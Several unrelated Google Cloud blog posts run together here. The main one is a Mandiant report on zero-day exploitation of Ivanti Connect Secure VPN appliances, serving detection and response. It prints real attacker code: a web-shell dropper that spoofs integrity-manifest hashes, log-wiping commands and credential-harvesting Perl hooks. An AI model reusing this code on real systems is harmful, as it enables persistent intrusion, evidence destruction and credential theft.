To help close this gender gap, we are opening up applications for the Google for Startups Accelerator: Women Founders program for Europe & Israel. This ten-week accelerator is designed to support Seed to Series A women-led AI startups with expert mentorship, technical support, and tailored workshops that lay the groundwork for scaling.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3eaa72e83190>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Fostering a more inclusive AI ecosystem
As AI continues to revolutionize industries, ensuring that diverse voices lead the way is critical for driving innovation that benefits everyone. The Google for Startups Accelerator: Women Founders program is working to level the playing field, empowering women-led startups to bring fresh, diverse perspectives to the future of AI.
Margaryta Sivakova, the CEO of Legal Nodes, leveraged support from the program to scale her business:“Through Google for Startups Accelerator, we learned to build, improve, and scale AI solutions, focusing on production-grade AI, MLOps, and the right infrastructure for rapid scaling.”
Maria Terzi, the CEO of Malloc Privacy, received one-on-one support to help users protect their data on their phones:“We joined Google for Startups Accelerator to enhance our technology and gained much more—insights on pricing, sales, UI/UX design, people management, and fast-paced operations.”
Watch highlights from the Google for Startups Accelerator Women Founders program.
Apply now
Women-led startups building with AI in Europe and Israel can apply until January 24 for the 2025 cohort of the Google for Startups Accelerator: Women Founders program.
Written by: John Wolfram, Josh Murchie, Matt Lin, Daniel Ainsworth, Robert Wallace, Dimiter Andonov, Dhanesh Kizhakkinan, Jacob Thompson
Note: This is a developing campaign under active analysis by Mandiant and Ivanti. We will continue to add more indicators, detections, and information to this blog post as needed.
On Wednesday, Jan. 8, 2025, Ivanti disclosed two vulnerabilities, CVE-2025-0282 and CVE-2025-0283, impacting Ivanti Connect Secure (“ICS”) VPN appliances. Mandiant has identified zero-day exploitation of CVE-2025-0282 in the wild beginning mid-December 2024. CVE-2025-0282 is an unauthenticated stack-based buffer overflow. Successful exploitation could result in unauthenticated remote code execution, leading to potential downstream compromise of a victim network.
Ivanti and its affected customers identified the compromise based on indications from the company-supplied Integrity Checker Tool (“ICT”) along with other commercial security monitoring tools. Ivanti has been working closely with Mandiant, affected customers, government partners, and security vendors to address these issues. As a result of their investigation, Ivanti has released patches for the vulnerabilities exploited in this campaign and Ivanti customers are urged to follow the actions in the Security Advisory to secure their systems as soon as possible.
Mandiant is currently performing analysis of multiple compromised Ivanti Connect Secure appliances from multiple organizations. The activity described in this blog utilizes insights collectively derived from analysis of these infected devices and have not yet conclusively tied all of the activity described below to a single actor. In at least one of the appliances undergoing analysis, Mandiant observed the deployment of the previously observed SPAWN ecosystem of malware (which includes the SPAWNANT installer, SPAWNMOLE tunneler and the SPAWNSNAIL SSH backdoor). The deployment of theSPAWN ecosystem of malware following the targeting of Ivanti Secure Connect appliances has been attributed to UNC5337, a cluster of activity assessed with moderate confidence to be part of UNC5221, which is further described in theAttribution section.
Mandiant has also identified previously unobserved malware families from additional compromised appliances, tracked as DRYHOOK and PHASEJAM that are currently not yet linked to a known group.
It is possible that multiple actors are responsible for the creation and deployment of these various code families (i.e. SPAWN, DRYHOOK and PHASEJAM), but as of publishing this report, we don’t have enough data to accurately assess the number of threat actors targeting CVE-2025-0282. As additional insights are gathered, Mandiant will continue to update this blog post.
Exploitation
While CVE-2025-0282 affects multiple patch levels of ICS release 22.7R2, successful exploitation is version specific. Prior to exploitation, repeated requests to the appliance have been observed, likely to determine the version prior to attempting exploitation.
Version detection has been observed using the Host Checker Launcher, shown above, and the different client installers to determine the version of the appliance. HTTP requests from VPS providers or Tor networks to these URLs, especially in sequential version order, may indicate pre-exploitation reconnaissance.
While there are several variations during the exploitation of CVE-2025-0282, the exploit and script generally performs the following steps:
Disable SELinux
Prevent syslog forwarding
Remount the drive as read-write
Write the script
Execute the script
Deploy one or more web shells
Use sed to remove specific log entries from the debug and application logs
Reenable SELinux
Remount the drive
Immediately after exploitation the threat actor disables SELinux, uses iptables to block syslog forwarding, and remounts the root partition to enable writing of malware to the appliance.
setenforce 0
iptables -A OUTPUT -p udp --dport 514 -j DROP
iptables -A OUTPUT -p tcp --dport 514 -j DROP
iptables -A OUTPUT -p udp --dport 6514 -j DROP
iptables -A OUTPUT -p tcp --dport 6514 -j DROP
mount -o remount,rw /
Malware Staging
Mandiant observed the threat actor using the shell script to echo a Base64-encoded script into the /tmp/.t, and then set execution permissions on the file. The figure below shows the contents of /tmp/.t.
Next, the threat actor writes a Base-64 encoded ELF binary into /tmp/svb. The ELF binary first uses setuid to set the owner of the process to root. It then executes /tmp/s (PHASEJAM) which would inherit the root privileges of the parent process. The threat actor then uses dd to overwrite the svb file with zeros, and removes /tmp/.t.
PHASEJAM is a dropper written as a bash shell script that maliciously modifies Ivanti Connect Secure appliance components. The primary functions of PHASEJAM are to insert a web shell into the getComponent.cgi and restAuth.cgi files, block system upgrades by modifying the DSUpgrade.pm file, and overwrite the remotedebug executable so that it can be used to execute arbitrary commands when a specific parameter is passed.
Web Shell
PHASEJAM inserts the web shell into the legitimate files getComponent.cgi and restAuth.cgi as a function named AccessAllow(). The web shell is Perl-based and provides the threat actor with remote access and code execution capabilities on the compromised ICS server. It utilizes the MIME::Base64 module to encode and decode commands and data.
The table below summarizes the web shell’s functionality, accessible via specific commands derived from HTTP query parameters:
Command
Description
1
Decodes the code provided in the HTTP_CODE environment variable and writes the result into a file named test.p under the /tmp directory. Executes the file using /bin/bash and returns the output of the command execution to the attacker.
2
Similar to command 1 but executes the provided commands using /home/bin/dsrunpriv and the patched remotedebug file.
3
Writes a file with a name specified in the HTTP_CODE environment variable under the /tmp directory with content provided in the License parameter. This functionality allows the attacker to upload arbitrary files on the compromised appliance.
4
Reads the content of a file specified in the Base64-decoded HTTP_CODE environment variable and returns the content to the attacker. This enables the attacker to exfiltrate data from the affected appliance.
5
Similar to command 3 but overwrites the target file instead of appending to it, in case it already exists on the appliance.
Blocked and Simulated Upgrades
To intercept upgrade attempts and simulate an upgrade, PHASEJAM injects a malicious function into the /home/perl/DSUpgrade.pm file named processUpgradeDisplay(). The functionality is intended to simulate an upgrading process that involves thirteen steps, with each of those taking a predefined amount of time. If the ICS administrator attempts an upgrade, the function displays a visually-convincing upgrade process that shows each of the steps along with various numbers of dots to mimic a running process. Further details are provided in the System Upgrade Persistence section.
remotedebug Hooking
PHASEJAM renames the file /home/bin/remotedebug to remotedebug.bak. PHASEJAM writes a new /home/bin/remotedebug shell script to hook calls to remotedebug. The brief shell script checks for a new -c parameter that allows remote code execution by the web shell. All other parameters are passed through to remotedebug.bak.
The following provides an abridged PHASEJAM Sample:
# create backdoor 1
cp /home/webserver/htdocs/dana-na/jam/getComponent.cgi
/home/webserver/htdocs/dana-na/jam/getComponent.cgi.bak
sed -i 's/sub main {/sub main {my $r7=AccessAllow();return if
$r7;/g' /home/webserver/htdocs/dana-na/jam/getComponent.cgi
sh=$(echo CnN1YiB...QogICAK|base64 -d)
up=$(echo CnN1YiB...xuIjsKCn0K |base64 -d)
grep -q 'sub AccessAllow()' || echo "$sh" >>
/home/webserver/htdocs/dana-na/jam/getComponent.cgi
sed -i "s/$(grep /home/webserver/htdocs/dana-na/jam/getComponent.cgi
/home/etc/manifest/manifest -a |grep
-oE '[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/webserver/htdocs/dana-na/jam/getComponent.cgi |grep
-oE '[0-9a-f]{64}')/g" /home/etc/manifest/manifest;
#pkill cgi-server
# create backdoor 2
cp /home/webserver/htdocs/dana-na/auth/restAuth.cgi
/home/webserver/htdocs/dana-na/auth/restAuth.cgi.bak
sed -i 's/sub main {/sub main {my $r7=AccessAllow();return if
$r7;/g' /home/webserver/htdocs/dana-na/auth/restAuth.cgi
grep -q 'sub AccessAllow()' echo "$sh" >>
/home/webserver/htdocs/dana-na/auth/restAuth.cgi
sed -i "s/$(grep /home/webserver/htdocs/dana-na/auth/restAuth.cgi
/home/etc/manifest/manifest -a |grep -oE '[0-9a-f]{64}')/$(/home/bin/openssl
dgst -sha256 /home/webserver/htdocs/dana-na/auth/restAuth.cgi |grep
-oE '[0-9a-f]{64}')/g" /home/etc/manifest/manifest;
#pkill cgi-server
# remotedebug
cp -f /home/bin/remotedebug /home/bin/remotedebug.bak
echo IyEvYmluL2Jhc2gKaWYgWyAiJDEiID09ICItYyIgXTsgdGhlbgoJYm
FzaCAiJEAiCmVsc2UKCWV4ZWMgL2hvbWUvYmluL3JlbW90ZWRlYnV
nLmJhayAiJEAiCmZpICAK|base64 -d >/home/bin/remotedebug
chmod 777 /home/bin/remotedebug.bak
sed -i "s/$(grep /home/bin/remotedebug /home/etc/manifest/manifest
-a |grep -oE '[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/bin/remotedebug |grep -oE '[0-9a-f]{64}')/g"
/home/etc/manifest/manifest;
# upgrade
cp -f /home/perl/DSUpgrade.pm /home/perl/DSUpgrade.pm.bak
sed -i 's/popen(*FH, $prog);/processUpgradeDisplay($prog,
$console, $html);return 0;popen(*FH, $prog);/g'
/home/perl/DSUpgrade.pm
grep -q 'sub processUpgradeDisplay()' || echo "$up" >>
/home/perl/DSUpgrade.pm
sed -i "s/$(grep /home/perl/DSUpgrade.pm /home/etc/manifest/manifest
-a |grep -oE '[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/perl/DSUpgrade.pm |grep -oE '[0-9a-f]{64}')/g"
/home/etc/manifest/manifest;
pkill cgi-server
Anti-Forensics
Following exploitation, the threat actor has been observed removing evidence of exploitation from several key areas of the appliance:
Clearing kernel messages using dmesg and removing entries from the debug logs that are generated during the exploit
Deleting troubleshoot information packages (state dumps) and any core dumps generated from process crashes
Removing log application event log entries related to syslog failures, internal ICT failures, crash traces, and certificate handling errors
Removing executed commands from the SELinux audit log
dmesg -C
cd /data/var/dlogs/
sed -i '/segfault/d' debuglog
sed -i '/segfault/d' debuglog.old
sed -i '/SystemError/d' debuglog
sed -i '/SystemError/d' debuglog.old
sed -i '/ifttls/d' debuglog
sed -i '/ifttls/d' debuglog.old
sed -i '/main.cc/d' debuglog
sed -i '/main.cc/d' debuglog.old
sed -i '/SSL_read/d' debuglog
sed -i '/SSL_read/d' debuglog.old
sed -i '/tlsconnectionpoint/d' debuglog
sed -i '/tlsconnectionpoint/d' debuglog.old
rm -rf /data/var/statedumps/*
rm -rf /data/var/cores/*
cd /home/runtime/logs
sed -i 's/[^x00]{1}x00[^x00]*web server[^x00]*x00//g' log.events.vc0
sed -i 's/[^x00]{1}x00[^x00]*AUT24604[^x00]*x00//g' log.events.vc0
sed -i 's/[^x00]{1}x00[^x00]*SYS31048[^x00]*x00//g' log.events.vc0
sed -i 's/[^x01]{1}x01[^x01]*SYS31376[^x01]*x01//g' log.events.vc0
sed -i 's/x01[^x01]{2,3}6[^x01]*ERR10073[^xff]*x09[^x01]{1}x01/
x01/g' log.events.vc0
cd /data/var/log/audit/
sed -i '/bin/web/d' audit.log
sed -i '/setenforce/d' audit.log
sed -i '/mount/d' audit.log
sed -i '/bin/rm/d' audit.log
System Upgrade Persistence
Mandiant identified two techniques the threat actor employed to persist across system upgrades on compromised Ivanti Connect Secure appliances.
Fake System Upgrades
The first technique, utilized by PHASEJAM, prevents legitimate ICS system upgrade attempts by administrators via rendering a fake HTML upgrade progress bar while silently blocking the legitimate upgrade process. Due to the blocked upgrade attempt, the technique would allow any installed backdoors or tools left by the threat actor to persist on the current running version of the VPN while giving the appearance of a successful upgrade.
First, the threat actor uses sed to insert a malicious Perl code into DSUpgrade.pm to modify the behavior of the system upgrade process. The malicious processUpgradeDisplay() function, which is stored in the shell variable $up, is appended to DSUpgrade.pm.
The modification occurs within a function in DSUpgrade.pm responsible for installing the new upgrade package. The inserted call to processUpgradeDisplay() with the early return makes the legitimate popen() call to execute /pkg/dspkginstall unreachable. The following provides the relevant excerpt from DSUpgrade.pm as a result of the modification.
local *FH;
my $prog = "/pkg/dspkginstall /var/tmp/new-pack.tgz";
if (defined $useUpgradePartition && $useUpgradePartition == 1) {
$prog = "/pkg/dspkginstall /data/upgrade/new-pack.tgz";
}
processUpgradeDisplay($prog, $console, $html);
return 0;
popen(*FH, $prog);
The modification intercepts the standard upgrade flow by calling the maliciously created processUpgradeDisplay() function before the legitimate upgrade command executes. The figure below provides an excerpt of the inserted processUpgradeDisplay() function that displays a fake HTML upgrade progress bar, using the sleep command to add dots every second to mimic a running process.
Recent versions of Ivanti Connect Secure have a built-in integrity checker tool (ICT) that periodically scans the file system to detect new or modified system files that may be indicative of system compromise. The ICT uses a manifest during its scanning process,containing a list of the expected file paths on the system along with its expected SHA256 hash. In an attempt to circumvent the ICT scanner, the threat actor recalculates the SHA256 hash of the modified DSUpgrade.pm and inserts it into the manifest.
sed -i "s/$(grep /home/perl/DSUpgrade.pm
/home/etc/manifest/manifest -a |grep -oE
'[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/perl/DSUpgrade.pm |grep -oE '[0-9a-f]{64}')/g"
/home/etc/manifest/manifest;
The threat actor copies the VERSION file from the mounted upgrade partition (tmp/root/home/VERSION) to the current version partition (/home/VERSION). As a result, the system falsely indicates a successful upgrade while continuing to run on the old appliance version.
SPAWNANT and its supporting components can persist across system upgrades. It hijacks the execution flow of dspkginstall, a binary used during the system upgrade process, by exporting a malicious snprintf function containing the persistence mechanism.
Unlike the first method described in this blog post for system upgrade persistence, SPAWNANT does not block the upgrade process. It survives the upgrade process by ensuring itself and its components are migrated to the new upgrade partition (mounted on /tmp/data/ during a legitimate system upgrade process).
SPAWNANT sets the LD_PRELOAD environment variable to itself (libupgrade.so) within DSUpgrade.pm on the upgrade partition. The modification tells the dynamic linker to load libupgrade.so and use SPAWNANT’s malicious exported snprintf function before other libraries.
ENV{“LD_PRELOAD”} = “libupgrade.so”
Next, SPAWNANT establishes an additional method of backdoor access by writing a web shell into compcheckresult.cgi on the upgrade partition. The web shell uses system() to execute the value passed to a hard-coded query parameter. The following provides the relevant excerpt of the inserted web shell.
Throughout this entire process, SPAWNANT is careful to circumvent the ICT by recalculating the SHA256 hash for any maliciously modified files. Once the appropriate modifications are complete, SPAWNANT generates a new RSA key pair to sign the modified manifest.
After establishing an initial foothold on an appliance, Mandiant observed a number of different tunnelers, including the use of publicly-available and open-source tunnelers, designed to facilitate communication channels between the compromised appliance and the threat actor’s command and control infrastructure. These tunnelers allowed the attacker to bypass network security controls and may enable lateral movement further into a victim environment.
SPAWNMOLE
Originally reported in Cutting Edge, Part 4, SPAWNMOLE is a tunneler injected into the web process. It hijacks the accept function in the web process to monitor traffic and filter out malicious traffic originating from the attacker. SPAWNMOLE is activated when it detects a specific series of magic bytes. Otherwise, the remainder of the benign traffic is passed unmodified to the legitimate web server functions. The malicious traffic is tunneled to a host provided by an attacker in the buffer.
LDAP Queries
The threat actor used several tools to perform internal network reconnaissance. This includes using built-in tools included on the ICS appliance such as nmap and dig to determine what can be accessed from the appliance. The threat actor has also been observed using the LDAP service account, if configured, from the ICS appliance to perform LDAP queries. The LDAP service account was also observed being used to move laterally within the network, including Active Directory servers, through SMB or RDP. The observed attacker commands were prefaced by the following lines:
LDAP queries were executed using /tmp/lmdbcerr, with output directed to randomly named files in the /tmp directory. Password, host, and query were passed as command line arguments.
Mandiant has observed the threat actor archiving the database cache on a compromised appliance and staging the archived data in a directory served by the public-facing web server to enable exfiltration of the database. The database cache may contain information associated with VPN sessions, session cookies, API keys, certificates, and credential material.
The threat actor archives the contents of /runtime/mtmp/lmdb. The resulting tar archive is then renamed and masquerades itself as a CSS file located within /home/webserver/htdocs/dana-na/css/.
Ivanti has previously published guidance on remediating the risk that may result from the database cache dump. This includes resetting local account credentials, resetting API keys, and revoking certificates.
Credential Harvesting
Mandiant has observed the threat actor deploying a Python script, tracked as DRYHOOK, to steal credentials. The malware is designed to modify a system component named DSAuth.pm that belongs to the Ivanti Connect Secure environment in order to harvest successful authentications.
Upon execution, the malicious Python script opens /home/perl/DSAuth.pm and reads its content in a buffer. Next, the malware uses regular expressions to find and replace the following lines of code:
The *setPrompt value above is replaced with the following Perl code:
# *setPrompt
$ds_g="";
sub setPrompt{
eval{
my $res=@_[1]."=".@_[2]."n";
$ds_g .= $res;
};
return DSAuthc::RealmSignin_setPrompt(@_);
}
$ds_e="";
The injected setPrompt routine captures the second and the third parameter, combines them into the format <param2>=<param3> and then assigns the produced string to a global variable named $ds_g. The next replacement, shown as follows, reveals that the second parameter is a username, and the third parameter is the password of a user trying to authenticate.
# *runSignin = *DSAuthc::RealmSignin_runSignin;
$ds_g1="";
sub encode_base64 ($;$)
{
my $res = "";
my $eol = $_[1];
$eol = "n" unless defined $eol;
pos($_[0]) = 0; # ensure start at the beginning
$res = join '', map( pack('u',$_)=~ /^.(S*)/, ($_[0]=~/(.{1,45})/gs));
$res =~ tr|` -_|AA-Za-z0-9+/|; # `# help emacs
# fix padding at the end
my $padding = (3 - length($_[0]) % 3) % 3;
$res =~ s/.{$padding}$/'=' x $padding/e if $padding;
return $res;
}
sub runSignin{
my $res=DSAuthc::RealmSignin_runSignin(@_);
if(@_[1]->{status} != $DSAuth::Reject &&
@_[1]->{status} != $DSAuth::Restart){
if($ds_g ne ""){
CORE::open(FH,">>/tmp/cmdmmap.kuwMW");
my $dd=RC4("redacted",$ds_g);
print FH encode_base64($dd)."n";
CORE::close(FH);
$ds_g = "";
}
}
elsif(@_[1]->{status} == $DSAuth::Reject ||
@_[1]->{status} == $DSAuth::Restart){
$ds_g = "";
}
return $res;
}
$ds_e1="";
The code above contains two subroutines named encode_base64 and runSignin. The former takes a string and Base64 encodes it, while the latter intercepts the sign-in process and upon a successful attempt serializes the saved credentials into the global variable $ds_g username and password in a file named cmdmmap.kuwMW under the /tmp directory. The <username>=<password> string is first RC4 encrypted with a hard-coded key and then Base64 encoded with the encode_base64 routine before being saved into the cmdmmap.kuwMW file.
The last code replacement is shown as follows, and it is the same code as above, but it targets a different sign-in scheme that is named EBSL in the code.
# *runSigninEBSL
$ds_g2="";
sub runSigninEBSL{
my $res=DSAuthc::RealmSignin_runSigninEBSL(@_);
if(@_[1]->{status} != $DSAuth::Reject &&
@_[1]->{status} != $DSAuth::Restart){
if($ds_g ne ""){
use Crypt::RC4;
CORE::open(FH,">>/tmp/cmdmmap.kuwMW");
my $dd=RC4("redacted",$ds_g);
print FH encode_base64($dd)."n";
CORE::close(FH);
$ds_g = "";
}
}
elsif(@_[1]->{status} == $DSAuth::Reject ||
@_[1]->{status} == $DSAuth::Restart){
$ds_g = "";
}
return $res;
}
$ds_e2="";
After the changes are made, the malware attempts to write the modified content back to the DSAuth.pm file, and if unsuccessful, it will remount the file system as readwrite, write the file, and then mount the file system as readonly again. Finally, all instances of the cgi-server process are killed in order for the modified DSAuth.pm to be activated.
Attribution
Mandiant has previously only observed the deployment of the SPAWN ecosystem of malware on Ivanti Connect Secure appliances by UNC5337. UNC5337 is a China-nexus cluster of espionage activity including operations that compromised Ivanti Connect Secure VPN appliances as early as Jan. 2024 and most recently as Dec. 2024. This included the Jan 2024 exploitation of CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) to compromise Ivanti Connect Secure appliances. UNC5337 then leveraged multiple custom malware families including the SPAWNSNAIL passive backdoor, SPAWNMOLE tunneler, SPAWNANT installer, and SPAWNSLOTH log tampering utility. Mandiant suspects with medium confidence that UNC5337 is part of UNC5221.
UNC5221 is a suspected China-nexus espionage actor that exploited vulnerabilities CVE-2023-46805 and CVE-2024-21887, which impacted Ivanti Connect Secure VPN and Ivanti Policy Security appliances as early as December 2023. Following the successful exploitation of CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection), UNC5221 leveraged multiple custom malware families, including the ZIPLINE passive backdoor, THINSPOOL dropper, LIGHTWIRE web shell, and WARPWIRE credential harvester. UNC5221 was also observed leveraging the PySoxy tunneler and BusyBox to enable post-exploitation activity. Additionally, Mandiant previously observed UNC5221 leveraging a likely ORB network of compromised Cyberoam appliances to enable intrusion operations.
Conclusion
Following the Jan. 10, 2024, disclosure of CVE-2023-46805 and CVE-2024-21887, Mandiant observed widespread exploitation by UNC5221 targeting Ivanti Connect Secure appliances across a wide range of countries and verticals. Mandiant assesses that defenders should be prepared for widespread, opportunistic exploitation, likely targeting credentials and the deployment of web shells to provide future access. Additionally, if proof-of-concept exploits for CVE-2025-0282 are created and released, Mandiant assesses it is likely additional threat actors may attempt targeting Ivanti Connect Secure appliances.
Recommendations
Ivanti recommends utilizing their external and internal Integrity Checker Tool (“ICT”) and to contact Ivanti Support if suspicious activity is identified. While Mandiant has observed threat actor attempts to evade detection by the ICT, the following screenshots provide examples of how a successful scan should appear versus an unsuccessful scan on a device that has been compromised. Note the number of steps reported by the output.
External ICT Scan – Successful
External ICT Scan – Unsuccessful (limited number of steps performed)
Ivanti also notes that the ICT is a snapshot of the current state of the appliance and cannot necessarily detect threat actor activity if they have returned the appliance to a clean state. The ICT does not scan for malware or other Indicators of Compromise. Ivanti recommends that customers should run the ICT in conjunction with other security monitoring tools which have detected post-exploitation activity.
If the ICT result shows signs of compromise, Ivanti recommends a factory reset on the appliance to ensure any malware is removed and to then place the appliance back into production using version 22.7R2.5.
Acknowledgement
We would like to thank the team at Ivanti for their continued partnership and support in this investigation. Additionally, this analysis would not have been possible without the assistance from analysts across Google Threat Intelligence Group and Mandiant’s FLARE.
Indicators of Compromise (IOCs)
To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a publicly available GTI Collection.
rule M_APT_Installer_SPAWNSNAIL_1
{
meta:
author = "Mandiant"
description = "Detects SPAWNSNAIL. SPAWNSNAIL is an SSH
backdoor targeting Ivanti devices. It has an ability to inject a specified
binary to other process, running local SSH backdoor when injected to
dsmdm process, as well as injecting additional malware to dslogserver"
md5 = "e7d24813535f74187db31d4114f607a1"
strings:
$priv = "PRIVATE KEY-----" ascii fullword
$key1 = "%d/id_ed25519" ascii fullword
$key2 = "%d/id_ecdsa" ascii fullword
$key3 = "%d/id_rsa" ascii fullword
$sl1 = "[selinux] enforce" ascii fullword
$sl2 = "DSVersion::getReleaseStr()" ascii fullword
$ssh1 = "ssh_set_server_callbacks" ascii fullword
$ssh2 = "ssh_handle_key_exchange" ascii fullword
$ssh3 = "ssh_add_set_channel_callbacks" ascii fullword
$ssh4 = "ssh_channel_close" ascii fullword
condition:
uint32(0) == 0x464c457f and $priv and any of ($key*)
and any of ($sl*) and any of ($ssh*)
}
rule M_APT_Installer_SPAWNANT_1
{
meta:
author = "Mandiant"
description = "Detects SPAWNANT. SPAWNANT is an
Installer targeting Ivanti devices. Its purpose is to persistently
install other malware from the SPAWN family (SPAWNSNAIL,
SPAWNMOLE) as well as drop additional webshells on the box."
strings:
$s1 = "dspkginstall" ascii fullword
$s2 = "vsnprintf" ascii fullword
$s3 = "bom_files" ascii fullword
$s4 = "do-install" ascii
$s5 = "ld.so.preload" ascii
$s6 = "LD_PRELOAD" ascii
$s7 = "scanner.py" ascii
condition:
uint32(0) == 0x464c457f and 5 of ($s*)
}
rule M_APT_Tunneler_SPAWNMOLE_1
{
meta:
author = "Mandiant"
description = "Detects a specific comparisons in SPAWNMOLE
tunneler, which allow malware to filter put its own traffic .
SPAWNMOLE is a tunneler written in C and compiled as an ELF32
executable. The sample is capable of hijacking a process on the
compromised system with a specific name and hooking into its
communication capabilities in order to create a proxy server for
tunneling traffic."
md5 = "4f79c70cce4207d0ad57a339a9c7f43c"
strings:
/*
3C 16 cmp al, 16h
74 14 jz short loc_5655C038
0F B6 45 C1 movzx eax, [ebp+var_3F]
3C 03 cmp al, 3
74 0C jz short loc_5655C038
0F B6 45 C5 movzx eax, [ebp+var_3B]
3C 01 cmp al, 1
0F 85 ED 00 00 00 jnz loc_5655C125
*/
$comparison1 = { 3C 16 74 [1] 0F B6 [2] 3C 03 74 [1] 0F B6 [2]
3C 01 0F 85 }
/*
81 7D E8 E2 E3 49 FB cmp [ebp+var_18], 0FB49E3E2h
0F 85 CD 00 00 00 jnz loc_5655C128
81 7D E4 61 83 C3 1B cmp [ebp+var_1C], 1BC38361h
0F 85 C0 00 00 00 jnz loc_5655C128
*/
$comparison2 = { 81 [2] E2 E3 49 FB 0F 85 [4] 81 [2] 61 83 C3
1B 0F 85}
condition:
uint32(0) == 0x464c457f and all of them
}
Online video consumption has skyrocketed. A staggering 1.8 billion people globally subscribed to streaming services in 20231, and 92% of internet users worldwide watched online videos every month in 20242. This growth creates a significant opportunity for advertisers who want to reach their customers with great creative, but ineffective ad placement can disrupt their customers’ viewing experiences.
An important way to deliver a better ad experience is seamless ad integration, which means placing ads at natural breaks in video content to avoid interrupting the narrative flow. Scene change detection technology identifies these natural breaks by analyzing a video’s visual, audio, and textual elements. Google’s AI models such as Gemini offer a win-win for viewers and advertisers:
Increased viewer engagement: Seamless ad integration minimizes disruption and enhances the viewing experience.
Higher ad revenue: More relevant ads lead to better click-through rates and increased advertiser ROI.
Simplified workflows: Google Cloud’s Vertex AI platform streamlines the entire video monetization process, from scene detection to ad placement.
To help you maximize the potential of your ad inventory, we’ll share how Google Cloud’s generative AI revolutionizes scene detection, leading to more effective ad placement, improved reach, higher viewer engagement, and ultimately, increased revenue for publishers.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud developer tools’), (‘body’, <wagtail.rich_text.RichText object at 0x3e009c3875e0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
The challenges of traditional ad break detection
Traditional ad break detection methods, designed primarily for structured television content with fade-outs and fixed commercial breaks, often struggle to identify ideal ad placement points in today’s diverse video landscape. These methods—including shot boundary detection, motion analysis, audio analysis, and rule-based systems—can miss subtle transitions, misinterpret rapid movement, operate independently of visual context, lack flexibility, and rely on manual tagging. This is where Google’s Gemini models can help.
Intelligent scene detection with Google’s Gemini models
Gemini’s multimodal capabilities can analyze video, audio, and text simultaneously, enabling a level of nuanced scene understanding that was previously impossible. Now, we can ask Gemini to understand the nuances of video content and generate very granular contextual metadata, unlocking capabilities that were previously impossible to achieve efficiently.
Here are some examples of how Gemini identifies ad breaks and provides detailed contextual metadata:
Ad Break Example
Transition Feeling
Transition Type
Narrative Type
Prior Scene Summary
Daytime to Evening Dinner
Cheerful, relaxed
Outdoor to indoor
Scene transition from plot to end
A group of friends enjoying dinner at a restaurant.
End of Tense Dialogue Scene
Tense, dramatic
Fade-out
Scene of rising conflict
Two characters arguing over a specific issue.
Busy Street to Quiet Cafe
Neutral
Hard cut, outdoor to indoor
Scene transition
A character walking along a busy street.
This enriched metadata allows for the precise matching of the right ad to the right user at the right time. For example, the first ad break (Daytime to Evening Dinner), with its associated sentiment of “cheerful and relaxed,” might be ideal for advertisements that resonate with those feelings such as travel, entertainment or leisure products, rather than just a product like cookware. By understanding not just the basic context, but also the emotional tone of a scene, Gemini facilitates a new level of contextual advertising that is far more engaging for the viewer.
Google Cloud, powered with the Gemini 1.5 Pro model, delivers a robust and scalable solution for intelligent ad break detection. Its multimodal analysis capabilities simultaneously process video, audio, and text to detect even subtle transitions, enabling seamless ad integration. Gemini’s ability to process up to 2 million tokens ensures comprehensive analysis of long videos across diverse genres with minimal retraining, offering versatility for media providers. This large context window allows the model to analyze approximately 2 hours of video and audio content in a single pass, which significantly reduces processing time and complexity compared to methods that require breaking videos into smaller chunks.
The architecture ensures high performance and reliability through these key stages:
Image 2 – Architecture diagram for the scene change detection
1. Video Ingestion and Storage (GCS): Videos are ingested and stored in Google Cloud Storage (GCS), a highly scalable and durable object storage service offering various storage classes to optimize cost and performance. GCS ensures high availability and accessibility for processing. Robust security measures, including Identity and Access Management (IAM) roles and fine-grained access controls, are in place.
2. Orchestration and simultaneous processing (Vertex AI pipelines & Gemini): Vertex AI pipelines orchestrate the end-to-end video analysis process, ensuring seamless execution of each stage. Vertex AI manages simultaneous processing of multiple videos using Google Gemini’s multimodal analysis, significantly accelerating the workflow while maintaining scalability. This includes built-in safety filters powered by Gemini, which perform a nuanced contextual analysis of video, audio, and text to discern potentially inappropriate content. The results are returned in JSON format, detailing scene change timestamps, video metadata, and contextual insights.
Post-processing is then applied to the JSON output to structure the data in a tabular format, ensuring compatibility with downstream storage and analysis tools. This includes:
Standardizing timestamps: Ensuring uniform time formats for consistent querying and integration.
Metadata mapping: Beyond basic metadata extraction, this stage includes the classification of scenes (or entire video programs) into industry standard taxonomies, such as the IAB’s, or the customer’s own custom taxonomies. This allows for more granular organization of video content based on their type and provides an easier method of ad targeting.
Error handling and data validation: Filtering out incomplete or invalid entries to maintain data quality.
3. Structured data storage and enrichment (BigQuery): The structured data resulting from Gemini’s scene change detection analysis, including timestamps, metadata, and contextual insights, is stored in BigQuery. BigQuery ML can leverage this integrated data to build predictive models for ad placement optimization. For example, you can schedule a 15-second action-themed ad during a scene change in an action sequence, targeting viewers who frequently watch action movies in the evening.
4. Monitoring and logging (GCP operations suite): GCP Operations Suite provides comprehensive monitoring and alerting for the entire pipeline, including real-time visibility into job progress and system health. This includes detailed logging, automated alerts for failures, and dashboards for key performance indicators. This proactive approach ensures timely issue resolution and maximizes system reliability.
Foundation models such as Gemini have revolutionized how we work, but sometimes they need guidance to excel at specific business tasks. Perhaps their answers are too long, or their summaries miss the mark. That’s where supervised fine-tuning (SFT) comes in. When done right, it unlocks incredible precision to tailor Gemini for specialized tasks, domains, and stylistic nuances.
In an earlier blog, we covered when to embrace SFT and how it compares to other methods for optimizing your model’s output. In this blog, we’ll go deeper into how developers can streamline their SFT process, including:
Selecting the optimal model version
Crafting a high quality dataset
Best practices to evaluate the models, including tools to diagnose and overcome problems.
aside_block
